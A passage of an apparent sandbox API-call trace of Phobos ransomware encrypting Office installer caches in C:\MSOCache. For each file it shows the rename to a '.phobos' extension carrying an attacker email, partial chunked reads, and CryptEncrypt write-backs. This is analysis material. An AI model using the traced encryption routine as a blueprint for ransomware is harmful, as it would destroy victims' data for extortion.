[0150.440] CryptDestroyKey (hKey=0xa327e8) returned 1 [0150.440] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0150.441] CryptDestroyKey (hKey=0xa32da8) returned 1 [0150.441] CloseHandle (hObject=0x148) returned 1 [0150.441] CloseHandle (hObject=0x190) returned 1 [0150.441] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1 [0150.448] SetEvent (hEvent=0xe8) returned 1 [0150.448] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0150.448] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0150.448] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=18874884) returned 1 [0150.448] CloseHandle (hObject=0x190) returned 1 [0150.448] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020 [0150.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0150.449] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0150.449] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0150.449] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0150.449] ReadFile (in: hFile=0x190, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0150.843] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0150.843] ReadFile (in: hFile=0x190, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0151.052] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0151.052] ReadFile (in: hFile=0x190, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0151.073] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32de8) returned 1 [0151.073] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0151.073] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0151.081] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.081] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0151.081] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0151.092] SetEndOfFile (hFile=0x190) returned 1 [0151.092] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0151.093] WriteFile (in: hFile=0x190, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0151.094] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0151.094] WriteFile (in: hFile=0x190, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0151.097] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0151.097] WriteFile (in: hFile=0x190, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0151.098] CloseHandle (hObject=0x190) returned 1 [0151.098] SetEvent (hEvent=0xe8) returned 1 [0151.098] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0151.098] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0151.098] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3124224) returned 1 [0151.099] CloseHandle (hObject=0x190) returned 1 [0151.099] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi")) returned 0x2020 [0151.099] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0151.099] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0151.099] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0151.099] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0151.099] ReadFile (in: hFile=0x190, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0151.289] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0151.289] ReadFile (in: hFile=0x190, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0151.738] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0151.738] ReadFile (in: hFile=0x190, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0151.834] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa327e8) returned 1 [0151.834] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0151.834] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0151.842] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.842] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0151.842] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0151.862] SetEndOfFile (hFile=0x190) returned 1 [0151.862] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x2bac00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0151.862] WriteFile (in: hFile=0x190, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0151.864] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfe400, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0151.864] WriteFile (in: hFile=0x190, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0151.866] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0151.866] WriteFile (in: hFile=0x190, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0151.868] CloseHandle (hObject=0x190) returned 1 [0151.868] SetEvent (hEvent=0xe8) returned 1 [0151.868] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0151.868] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0151.869] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2797568) returned 1 [0151.869] CloseHandle (hObject=0x190) returned 1 [0151.869] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi")) returned 0x2020 [0151.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0151.869] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0151.870] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0151.870] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0151.870] ReadFile (in: hFile=0x190, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0152.197] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0152.197] ReadFile (in: hFile=0x190, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0152.268] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0152.268] ReadFile (in: hFile=0x190, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0152.665] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32c28) returned 1 [0152.665] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0152.665] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0152.672] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.672] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0152.672] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0152.691] SetEndOfFile (hFile=0x190) returned 1 [0152.691] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x26b000, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0152.691] WriteFile (in: hFile=0x190, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0152.693] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xe3aaa, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0152.693] WriteFile (in: hFile=0x190, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0152.696] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0152.696] WriteFile (in: hFile=0x190, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0152.697] CloseHandle (hObject=0x190) returned 1 [0152.698] SetEvent (hEvent=0xe8) returned 1 [0152.698] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0152.698] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.264] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=17456632) returned 1 [0153.264] CloseHandle (hObject=0x148) returned 1 [0153.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020 [0153.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0153.265] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.265] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.265] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x148, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.474] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.474] ReadFile (in: hFile=0x148, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.557] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0153.557] ReadFile (in: hFile=0x148, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0153.615] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32d28) returned 1 [0153.615] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0153.615] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0153.623] CryptDestroyKey (hKey=0xa32d28) returned 1 [0153.623] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0153.623] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0153.639] SetEndOfFile (hFile=0x148) returned 1 [0153.639] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0153.639] WriteFile (in: hFile=0x148, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0153.641] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0153.641] WriteFile (in: hFile=0x148, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0153.642] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0153.642] WriteFile (in: hFile=0x148, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0153.643] CloseHandle (hObject=0x148) returned 1 [0153.643] SetEvent (hEvent=0xe8) returned 1 [0153.643] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0153.643] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0153.646] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4095519) returned 1 [0153.646] CloseHandle (hObject=0x148) returned 1 [0153.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab")) returned 0x2020 [0153.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all 